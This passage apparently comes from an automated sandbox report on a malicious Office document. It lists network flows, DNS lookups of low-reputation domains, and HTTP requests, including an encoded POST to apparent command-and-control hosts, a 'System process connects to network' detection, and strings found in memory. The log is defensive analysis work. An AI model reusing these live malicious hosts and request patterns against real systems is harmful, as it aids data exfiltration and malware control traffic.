              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163

              Networking

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\rundll32.exeDomain query: www.diced.jp
              Source: C:\Windows\System32\rundll32.exeNetwork Connect: 153.121.40.91 443Jump to behavior
              Performs DNS queries to domains with low reputation
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeDNS query: www.swiftbyrte.xyz
              Source: Joe Sandbox ViewIP Address: 15.197.148.33 15.197.148.33
              Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
              Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
              Source: Joe Sandbox ViewASN Name: SAKURA-BSAKURAInternetIncJP SAKURA-BSAKURAInternetIncJP
              Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AC6CA823-E116-4D41-887B-65794B94B181}.tmpJump to behavior
              Source: global trafficHTTP traffic detected: GET /~lizard581/cgi-bin/imageup/data/1424.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: www.diced.jp
              Source: global trafficHTTP traffic detected: GET /5lk2/?2Z94P=LzK44tdp_JPt28wP&S6g0i61=xN5yXASnf8rfOFDMZPS3Aw0q6F9xWSQOcuF1ZBKgOvcqlR+sQpCJKI8dzMuE4/uzfZcBpIlRLxNBArokm5VkqsBLYuSwN+GZ1JVyf5BEJyjaCGsWVIC6Oje00DIX HTTP/1.1Host: www.d63dm.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /2018/sqlite-dll-win32-x86-3250000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /bbvc/?S6g0i61=AQnEtdfnecn/cJt9i/023LRQegDiN6HYsPciUFTRW5IBsDtKgzQsjW78chH883+eUHibxbeZVIJMdiRQvr4KlK/99b81DewKuJLGdX/rY9gS0DqA57O/0mcrhkmt&2Z94P=LzK44tdp_JPt28wP HTTP/1.1Host: www.danceonwater.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /1pj2/?S6g0i61=Q9HAAZkCTqKabe7K9gqmXFE+SKHCRVqPW1vmcslVAAVFIE4vmP8qeBByw9bQm+sf9dgpGu9sujYQB/6wq00OHtIuIS6zL5jH+2jz6veFJLP5dS32kbHd1AuYwep/&2Z94P=LzK44tdp_JPt28wP HTTP/1.1Host: www.foshape.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /4nss/?S6g0i61=6+WoHn2deLk8NJlLXYXNnS+xy6y4IG2yMX4VldfHBIoEopHs/Hw0Y5um7kzlNPuKTbh4gzzb5ORm5rQz5MS/zlApmrlBhjwV83cLky4dFg4gLxZewVN2CP71ee4I&2Z94P=LzK44tdp_JPt28wP HTTP/1.1Host: www.swiftbyrte.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: www.diced.jp
              Source: global trafficDNS traffic detected: DNS query: www.d63dm.top
              Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
              Source: global trafficDNS traffic detected: DNS query: www.danceonwater.net
              Source: global trafficDNS traffic detected: DNS query: www.foshape.top
              Source: global trafficDNS traffic detected: DNS query: www.swiftbyrte.xyz
              Source: global trafficDNS traffic detected: DNS query: www.maryneedskidneys.info
              Source: unknownHTTP traffic detected: POST /bbvc/ HTTP/1.1Host: www.danceonwater.netAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.danceonwater.netReferer: http://www.danceonwater.net/bbvc/Content-Length: 2164Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36Data Raw: 53 36 67 30 69 36 31 3d 4e 53 50 6b 75 72 58 74 41 4d 4b 34 49 4b 55 6a 37 2b 4d 71 38 34 59 4d 51 6e 57 35 50 72 33 65 35 66 51 44 58 31 66 39 43 4b 6b 32 7a 6a 46 73 31 44 4d 6a 73 6d 62 79 51 52 65 4c 68 31 61 53 63 47 75 53 6e 2f 71 6a 52 70 77 35 44 68 4a 56 71 37 52 33 79 4c 69 30 77 4f 56 34 43 74 41 6c 69 73 62 42 62 46 4c 55 4d 76 6f 62 37 52 50 45 2b 5a 47 33 36 6b 68 72 6b 44 48 35 36 47 35 4b 33 5a 5a 62 58 4f 36 65 48 64 55 64 50 41 68 34 43 48 6c 46 49 2f 58 35 4d 41 61 2b 6d 57 46 33 78 56 63 43 78 33 68 64 70 49 78 43 4e 4b 51 32 6e 74 52 66 63 4b 66 78 32 79 36 4f 56 4a 68 6c 51 45 72 6d 6c 48 50 32 7a 57 52 5a 58 2b 42 79 38 58 52 66 48 33 6d 6a 59 44 2f 30 73 62 63 4f 45 76 61 63 59 4b 4d 53 6a 74 64 31 71 53 73 76 32 47 74 4c 4a 7a 78 72 41 4e 4d 66 73 73 33 30 71 4e 6d 64 52 37 5a 37 78 4e 58 75 72 4d 52 6b 78 30 50 51 76 58 32 41 65 68 67 63 65 69 54 79 72 69 50 38 68 61 50 37 37 72 36 49 65 6c 33 4d 68 5a 4c 59 49 59 39 58 58 44 30 47 65 4f 70 55 34 31 4d 36 52 65 72 45 54 6c 58 70 32 6c 75 77 4a 73 48 6c 45 61 69 65 78 4c 55 6b 7a 38 54 63 4a 55 61 58 6e 59 49 43 61 69 62 59 6a 76 43 6c 67 66 54 70 77 52 68 39 74 35 59 39 74 38 57 31 31 62 30 62 51 6d 75 42 79 42 59 67 77 79 37 53 4d 62 4a 4c 52 50 41 45 31 36 7a 4a 57 52 6b 55 72 6d 49 4c 4e 6f 4d 72 6e 7a 6c 7a 4b 78 34 47 47 59 70 61 73 70 64 49 4f 51 41 31 45 4d 50 57 6c 62 61 41 6f 2b 2b 65 30 38 41 56 39 61 55 56 43 32 66 56 34 58 4c 69 72 71 6f 31 62 4f 34 41 44 49 32 65 6e 30 68 39 6b 63 4a 43 43 33 39 71 47 4f 62 75 53 46 6e 66 30 68 6e 67 59 65 48 42 72 59 31 55 45 57 6a 46 4e 6b 67 76 67 63 4b 78 6a 42 4d 6a 68 65 42 6a 65 33 63 46 71 56 70 49 6c 56 6e 76 61 42 38 53 62 31 2f 56 57 77 4d 52 30 65 67 62 6e 61 50 65 72 48 72 77 71 2b 6b 74 6c 66 6c 68 4d 54 75 56 73 63 42 51 71 54 59 73 41 69 55 53 45 34 70 72 65 45 34 35 4b 66 47 6d 58 38 51 79 50 7a 2f 4c 31 46 37 54 6c 58 71 68 48 63 68 74 45 48 55 4c 76 34 75 77 57 76 51 59 68 4f 6e 55 57 6c 5a 78 4c 74 66 4b 31 50 54 72 37 39 42 74 6e 74 6a 65 52 43 36 78 2f 2f 44 6d 6a 6f 57 78 76 76 73 43 6d 31 77 61 52 52 4a 30 62 51 45 6b 57 70 74 7a 53 57 54 64 71 71 55 32 65 51 78 71 65 68 38 38 72 79 41 4f 70 37 56 73 55 78 5a 35 38 48 71 6f 42 4a 41 6f 4b 37 56 55 57 6a 62 75 36 7a 6d 73 49 4e 38 71 6b 69 4a 53 61 74 46 72 50 35 30 5a 59 63 6d 52 67 4a 42 77 67 38 76 55 52 4a 49 6c 6b 46 64 72 58 70 79 46 36 64 53 2b 67 31 2f 33 77 55 49 36 70 73 2f 51 46 43 53 55 4d 69 43 7a 4d 64 4c 65 43 46 61 4d 34 6e 5a 36 69 66 38 39 39 36 63 4a 52 52 77 6c 64
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 09:04:29 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 09:05:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 09:05:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 09:05:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 09:05:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 09:05:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://aia.entrust.net/ovcs1-chain256.cer01
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://crl.entrust.net/g2ca.crl0;
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://crl.entrust.net/ovcs1.crl0J
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://ocsp.entrust.net00
